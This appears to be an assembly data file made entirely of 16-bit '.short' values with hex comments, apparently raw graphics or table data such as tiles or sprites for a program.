.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44545 ; 0xae01
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 38145 ; 0x9501
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 769 ; 0x301
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44801 ; 0xaf01
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44545 ; 0xae01
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 38145 ; 0x9501
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 769 ; 0x301
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44801 ; 0xaf01
.short 405 ; 0x195
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 259 ; 0x103
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 431 ; 0x1af
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 430 ; 0x1ae
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 405 ; 0x195
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 259 ; 0x103
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 431 ; 0x1af
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 430 ; 0x1ae
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 798 ; 0x31e
.short 13614 ; 0x352e
.short 31408 ; 0x7ab0
.short 13110 ; 0x3336
.short 256 ; 0x100
.short 33841 ; 0x8431
.short 34010 ; 0x84da
.short 16003 ; 0x3e83
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 12806 ; 0x3206
.short 34263 ; 0x85d7
.short 16003 ; 0x3e83
.short 11827 ; 0x2e33
.short 819 ; 0x333
.short 11779 ; 0x2e03
.short 7171 ; 0x1c03
.short 12350 ; 0x303e
.short 895 ; 0x37f
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 12350 ; 0x303e
.short 895 ; 0x37f
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 34097 ; 0x8531
.short 34266 ; 0x85da
.short 16003 ; 0x3e83
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 12350 ; 0x303e
.short 895 ; 0x37f
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 796 ; 0x31c
.short 13614 ; 0x352e
.short 13599 ; 0x351f
.short 13110 ; 0x3336
.short 13825 ; 0x3601
.short 13622 ; 0x3536
.short 11539 ; 0x2d13
.short 13946 ; 0x367a
.short 33281 ; 0x8201
.short 51845 ; 0xca85
.short 32900 ; 0x8084
.short 33152 ; 0x8180
.short 15873 ; 0x3e01
.short 55940 ; 0xda84
.short 32388 ; 0x7e84
.short 12158 ; 0x2f7e
.short 15873 ; 0x3e01
.short 55940 ; 0xda84
.short 32388 ; 0x7e84
.short 12158 ; 0x2f7e
.short 15873 ; 0x3e01
.short 55940 ; 0xda84
.short 32388 ; 0x7e84
.short 12158 ; 0x2f7e
.short 32513 ; 0x7f01
.short 55940 ; 0xda84
.short 33668 ; 0x8384
.short 16003 ; 0x3e83
.short 13057 ; 0x3301
.short 46202 ; 0xb47a
.short 13946 ; 0x367a
.short 13110 ; 0x3336
.short 11827 ; 0x2e33
.short 819 ; 0x333
.short 11779 ; 0x2e03
.short 7683 ; 0x1e03
.short 13878 ; 0x3636
.short 13107 ; 0x3333
.short 13107 ; 0x3333
.short 819 ; 0x333
.short 16001 ; 0x3e81
.short 15422 ; 0x3c3e
.short 13107 ; 0x3333
.short 829 ; 0x33d
.short 10799 ; 0x2a2f
.short 12335 ; 0x302f
.short 771 ; 0x303
.short 827 ; 0x33b
.short 10799 ; 0x2a2f
.short 12335 ; 0x302f
.short 771 ; 0x303
.short 827 ; 0x33b
.short 10799 ; 0x2a2f
.short 12335 ; 0x302f
.short 771 ; 0x303
.short 827 ; 0x33b
.short 12350 ; 0x303e
.short 12606 ; 0x313e
.short 771 ; 0x303
.short 827 ; 0x33b
.short 11827 ; 0x2e33
.short 2611 ; 0xa33
.short 257 ; 0x101
.short 261 ; 0x105
.short 38423 ; 0x9617
.short 38550 ; 0x9696
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 38524 ; 0x967c
.short 38550 ; 0x9696
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 38524 ; 0x967c
.short 38550 ; 0x9696
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 38524 ; 0x967c
.short 41366 ; 0xa196
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 38524 ; 0x967c
.short 55969 ; 0xdaa1
.short 38561 ; 0x96a1
.short 38550 ; 0x9696
.short 40828 ; 0x9f7c
.short 41434 ; 0xa1da
.short 38550 ; 0x9696
.short 38550 ; 0x9696
.short 55933 ; 0xda7d
.short 41676 ; 0xa2cc
.short 41634 ; 0xa2a2
.short 41634 ; 0xa2a2
.short 32102 ; 0x7d66
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 23933 ; 0x5d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 38550 ; 0x9696
.short 38550 ; 0x9696
.short 34721 ; 0x87a1
.short 32125 ; 0x7d7d
.short 38550 ; 0x9696
.short 38550 ; 0x9696
.short 41366 ; 0xa196
.short 32135 ; 0x7d87
.short 41634 ; 0xa2a2
.short 41634 ; 0xa2a2
.short 41634 ; 0xa2a2
.short 26316 ; 0x66cc
.short 6425 ; 0x1919
.short 6425 ; 0x1919
.short 6425 ; 0x1919
.short 4633 ; 0x1219
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 0 ; 0x0
.short 0 ; 0x0
.short 46849 ; 0xb701
.short 55996 ; 0xdabc
.short 0 ; 0x0
.short 256 ; 0x100
.short 47799 ; 0xbab7
.short 54490 ; 0xd4da
.short 0 ; 0x0
.short 47873 ; 0xbb01
.short 56021 ; 0xdad5
.short 56026 ; 0xdada
.short 0 ; 0x0
.short 769 ; 0x301
.short 771 ; 0x303
.short 771 ; 0x303
.short 256 ; 0x100
.short 28627 ; 0x6fd3
.short 55919 ; 0xda6f
.short 30682 ; 0x77da
.short 256 ; 0x100
.short 29914 ; 0x74da
.short 56026 ; 0xdada
.short 926 ; 0x39e
.short 54017 ; 0xd301
.short 884 ; 0x374
.short 40410 ; 0x9dda
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 47316 ; 0xb8d4
.short 297 ; 0x129
.short 0 ; 0x0
.short 0 ; 0x0
.short 18874 ; 0x49ba
.short 10569 ; 0x2949
.short 1 ; 0x1
.short 0 ; 0x0
.short 54484 ; 0xd4d4
.short 50364 ; 0xc4bc
.short 443 ; 0x1bb
.short 0 ; 0x0
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 30583 ; 0x7777
.short 28535 ; 0x6f77
.short 55919 ; 0xda6f
.short 1 ; 0x1
.short 771 ; 0x303
.short 38772 ; 0x9774
.short 55915 ; 0xda6b
.short 1 ; 0x1
.short 771 ; 0x303
.short 29699 ; 0x7403
.short 27788 ; 0x6c8c
.short 467 ; 0x1d3
.short 0 ; 0x0
.short 0 ; 0x0
.short 769 ; 0x301
.short 771 ; 0x303
.short 0 ; 0x0
.short 256 ; 0x100
.short 49342 ; 0xc0be
.short 49344 ; 0xc0c0
.short 0 ; 0x0
.short 48641 ; 0xbe01
.short 48574 ; 0xbdbe
.short 14906 ; 0x3a3a
.short 0 ; 0x0
.short 49153 ; 0xc001
.short 15037 ; 0x3abd
.short 15037 ; 0x3abd
.short 256 ; 0x100
.short 48830 ; 0xbebe
.short 48442 ; 0xbd3a
.short 14138 ; 0x373a
.short 256 ; 0x100
.short 15040 ; 0x3ac0
.short 14906 ; 0x3a3a
.short 14135 ; 0x3737
.short 256 ; 0x100
.short 48576 ; 0xbdc0
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 48641 ; 0xbe01
.short 15038 ; 0x3abe
.short 14138 ; 0x373a
.short 14138 ; 0x373a
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 259 ; 0x103
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 15037 ; 0x3abd
.short 15037 ; 0x3abd
.short 48573 ; 0xbdbd
.short 48442 ; 0xbd3a
.short 14906 ; 0x3a3a
.short 14906 ; 0x3a3a
.short 14906 ; 0x3a3a
.short 14906 ; 0x3a3a
.short 14135 ; 0x3737
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14906 ; 0x3a3a
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 769 ; 0x301
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 48442 ; 0xbd3a
.short 48442 ; 0xbd3a
.short 15037 ; 0x3abd
.short 48442 ; 0xbd3a
.short 48442 ; 0xbd3a
.short 14906 ; 0x3a3a
.short 14906 ; 0x3a3a
.short 14906 ; 0x3a3a
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14906 ; 0x3a3a
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 259 ; 0x103
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 48573 ; 0xbdbd
.short 48442 ; 0xbd3a
.short 48442 ; 0xbd3a
.short 14906 ; 0x3a3a
.short 14906 ; 0x3a3a
.short 48442 ; 0xbd3a
.short 14906 ; 0x3a3a
.short 14906 ; 0x3a3a
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 15037 ; 0x3abd
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 49344 ; 0xc0c0
.short 49344 ; 0xc0c0
.short 48573 ; 0xbdbd
.short 14906 ; 0x3a3a
.short 48573 ; 0xbdbd
.short 14906 ; 0x3a3a
.short 15037 ; 0x3abd
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 48442 ; 0xbd3a
.short 14138 ; 0x373a
.short 15037 ; 0x3abd
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14906 ; 0x3a3a
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14906 ; 0x3a3a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 771 ; 0x303
.short 259 ; 0x103
.short 0 ; 0x0
.short 0 ; 0x0
.short 14649 ; 0x3939
.short 14393 ; 0x3839
.short 1 ; 0x1
.short 0 ; 0x0
.short 14135 ; 0x3737
.short 11018 ; 0x2b0a
.short 312 ; 0x138
.short 0 ; 0x0
.short 14138 ; 0x373a
.short 2570 ; 0xa0a
.short 313 ; 0x139
.short 0 ; 0x0
.short 14903 ; 0x3a37
.short 2615 ; 0xa37
.short 14379 ; 0x382b
.short 1 ; 0x1
.short 14135 ; 0x3737
.short 2615 ; 0xa37
.short 14602 ; 0x390a
.short 1 ; 0x1
.short 14138 ; 0x373a
.short 2615 ; 0xa37
.short 14602 ; 0x390a
.short 1 ; 0x1
.short 14138 ; 0x373a
.short 14138 ; 0x373a
.short 11018 ; 0x2b0a
.short 312 ; 0x138
.short 17665 ; 0x4501
.short 47689 ; 0xba49
.short 54484 ; 0xd4d4
.short 47802 ; 0xbaba
.short 17667 ; 0x4503
.short 47689 ; 0xba49
.short 54484 ; 0xd4d4
.short 47802 ; 0xbaba
.short 10497 ; 0x2901
.short 48312 ; 0xbcb8
.short 54484 ; 0xd4d4
.short 48316 ; 0xbcbc
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 256 ; 0x100
.short 47657 ; 0xba29
.short 54980 ; 0xd6c4
.short 50372 ; 0xc4c4
.short 0 ; 0x0
.short 769 ; 0x301
.short 771 ; 0x303
.short 771 ; 0x303
.short 256 ; 0x100
.short 54457 ; 0xd4b9
.short 54341 ; 0xd445
.short 18876 ; 0x49bc
.short 47361 ; 0xb901
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 18761 ; 0x4949
.short 18761 ; 0x4949
.short 10057 ; 0x2749
.short 837 ; 0x345
.short 18761 ; 0x4949
.short 18761 ; 0x4949
.short 10057 ; 0x2749
.short 837 ; 0x345
.short 47288 ; 0xb8b8
.short 47288 ; 0xb8b8
.short 17733 ; 0x4545
.short 297 ; 0x129
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 47802 ; 0xbaba
.short 47802 ; 0xbaba
.short 10569 ; 0x2949
.short 1 ; 0x1
.short 771 ; 0x303
.short 771 ; 0x303
.short 259 ; 0x103
.short 0 ; 0x0
.short 47619 ; 0xba03
.short 841 ; 0x349
.short 10682 ; 0x29ba
.short 1 ; 0x1
.short 954 ; 0x3ba
.short 18874 ; 0x49ba
.short 47619 ; 0xba03
.short 297 ; 0x129
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 47105 ; 0xb801
.short 10196 ; 0x27d4
.short 47828 ; 0xbad4
.short 47655 ; 0xba27
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 952 ; 0x3b8
.short 17848 ; 0x45b8
.short 47107 ; 0xb803
.short 837 ; 0x345
.short 55809 ; 0xda01
.short 55924 ; 0xda74
.short 40666 ; 0x9eda
.short 30467 ; 0x7703
.short 55809 ; 0xda01
.short 884 ; 0x374
.short 771 ; 0x303
.short 771 ; 0x303
.short 54017 ; 0xd301
.short 55924 ; 0xda74
.short 40666 ; 0x9eda
.short 771 ; 0x303
.short 256 ; 0x100
.short 56026 ; 0xdada
.short 40666 ; 0x9eda
.short 771 ; 0x303
.short 256 ; 0x100
.short 29651 ; 0x73d3
.short 884 ; 0x374
.short 771 ; 0x303
.short 0 ; 0x0
.short 54017 ; 0xd301
.short 28525 ; 0x6f6d
.short 29812 ; 0x7474
.short 0 ; 0x0
.short 256 ; 0x100
.short 56019 ; 0xdad3
.short 27500 ; 0x6b6c
.short 0 ; 0x0
.short 0 ; 0x0
.short 769 ; 0x301
.short 56026 ; 0xdada
.short 771 ; 0x303
.short 29699 ; 0x7403
.short 27532 ; 0x6b8c
.short 986 ; 0x3da
.short 30979 ; 0x7903
.short 29699 ; 0x7403
.short 27532 ; 0x6b8c
.short 474 ; 0x1da
.short 926 ; 0x39e
.short 38772 ; 0x9774
.short 27788 ; 0x6c8c
.short 467 ; 0x1d3
.short 771 ; 0x303
.short 35956 ; 0x8c74
.short 55915 ; 0xda6b
.short 1 ; 0x1
.short 29699 ; 0x7403
.short 29079 ; 0x7197
.short 54124 ; 0xd36c
.short 1 ; 0x1
.short 27764 ; 0x6c74
.short 27755 ; 0x6c6b
.short 467 ; 0x1d3
.short 0 ; 0x0
.short 27755 ; 0x6c6b
.short 54234 ; 0xd3da
.short 1 ; 0x1
.short 0 ; 0x0
.short 56026 ; 0xdada
.short 259 ; 0x103
.short 0 ; 0x0
.short 0 ; 0x0
.short 49155 ; 0xc003
.short 48442 ; 0xbd3a
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 49155 ; 0xc003
.short 15037 ; 0x3abd
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 49155 ; 0xc003
.short 14927 ; 0x3a4f
.short 14138 ; 0x373a
.short 14135 ; 0x3737
.short 771 ; 0x303
.short 20416 ; 0x4fc0
.short 14135 ; 0x3737
.short 14650 ; 0x393a
.short 36611 ; 0x8f03
.short 20227 ; 0x4f03
.short 14650 ; 0x393a
.short 14905 ; 0x3a39
.short 40707 ; 0x9f03
.short 886 ; 0x376
.short 771 ; 0x303
.short 771 ; 0x303
.short 51203 ; 0xc803
.short 26769 ; 0x6891
.short 26728 ; 0x6868
.short 26728 ; 0x6868
.short 51203 ; 0xc803
.short 37017 ; 0x9099
.short 24415 ; 0x5f5f
.short 24415 ; 0x5f5f
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 2618 ; 0xa3a
.short 14135 ; 0x3737
.short 14903 ; 0x3a37
.short 14649 ; 0x3939
.short 20282 ; 0x4f3a
.short 14903 ; 0x3a37
.short 2615 ; 0xa37
.short 826 ; 0x33a
.short 48899 ; 0xbf03
.short 14123 ; 0x372b
.short 14138 ; 0x373a
.short 30211 ; 0x7603
.short 886 ; 0x376
.short 20303 ; 0x4f4f
.short 2615 ; 0xa37
.short 24438 ; 0x5f76
.short 30303 ; 0x765f
.short 14851 ; 0x3a03
.short 14649 ; 0x3939
.short 24415 ; 0x5f5f
.short 24424 ; 0x5f68
.short 886 ; 0x376
.short 771 ; 0x303
.short 24415 ; 0x5f5f
.short 22367 ; 0x575f
.short 26719 ; 0x685f
.short 26728 ; 0x6868
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14135 ; 0x3737
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 14135 ; 0x3737
.short 14906 ; 0x3a3a
.short 14135 ; 0x3737
.short 14135 ; 0x3737
.short 14649 ; 0x3939
.short 20281 ; 0x4f39
.short 14138 ; 0x373a
.short 14650 ; 0x393a
.short 826 ; 0x33a
.short 20227 ; 0x4f03
.short 14905 ; 0x3a39
.short 14905 ; 0x3a39
.short 30211 ; 0x7603
.short 886 ; 0x376
.short 14650 ; 0x393a
.short 826 ; 0x33a
.short 22902 ; 0x5976
.short 30297 ; 0x7659
.short 771 ; 0x303
.short 30211 ; 0x7603
.short 24409 ; 0x5f59
.short 22871 ; 0x5957
.short 26728 ; 0x6868
.short 30312 ; 0x7668
.short 22367 ; 0x575f
.short 22359 ; 0x5757
.short 26719 ; 0x685f
.short 14135 ; 0x3737
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14649 ; 0x3939
.short 14649 ; 0x3939
.short 14903 ; 0x3a37
.short 14649 ; 0x3939
.short 826 ; 0x33a
.short 48899 ; 0xbf03
.short 14649 ; 0x3939
.short 826 ; 0x33a
.short 30211 ; 0x7603
.short 886 ; 0x376
.short 14927 ; 0x3a4f
.short 30211 ; 0x7603
.short 24424 ; 0x5f68
.short 30303 ; 0x765f
.short 771 ; 0x303
.short 24438 ; 0x5f76
.short 24415 ; 0x5f5f
.short 22879 ; 0x595f
.short 26728 ; 0x6868
.short 26742 ; 0x6876
.short 14135 ; 0x3737
.short 14903 ; 0x3a37
.short 14138 ; 0x373a
.short 14138 ; 0x373a
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14135 ; 0x3737
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 14135 ; 0x3737
.short 14138 ; 0x373a
.short 14649 ; 0x3939
.short 14649 ; 0x3939
.short 14903 ; 0x3a37
.short 14647 ; 0x3937
.short 826 ; 0x33a
.short 20227 ; 0x4f03
.short 14159 ; 0x374f
.short 14905 ; 0x3a39
.short 36611 ; 0x8f03
.short 886 ; 0x376
.short 14671 ; 0x394f
.short 826 ; 0x33a
.short 25206 ; 0x6276
.short 30303 ; 0x765f
.short 771 ; 0x303
.short 30211 ; 0x7603
.short 24415 ; 0x5f5f
.short 30312 ; 0x7668
.short 26728 ; 0x6868
.short 22888 ; 0x5968
.short 26719 ; 0x685f
.short 14135 ; 0x3737
.short 14135 ; 0x3737
.short 2570 ; 0xa0a
.short 825 ; 0x339
.short 14903 ; 0x3a37
.short 14903 ; 0x3a37
.short 2570 ; 0xa0a
.short 825 ; 0x339
.short 14137 ; 0x3739
.short 14138 ; 0x373a
.short 2570 ; 0xa0a
.short 825 ; 0x339
.short 48442 ; 0xbd3a
.short 14137 ; 0x3739
.short 11018 ; 0x2b0a
.short 826 ; 0x33a
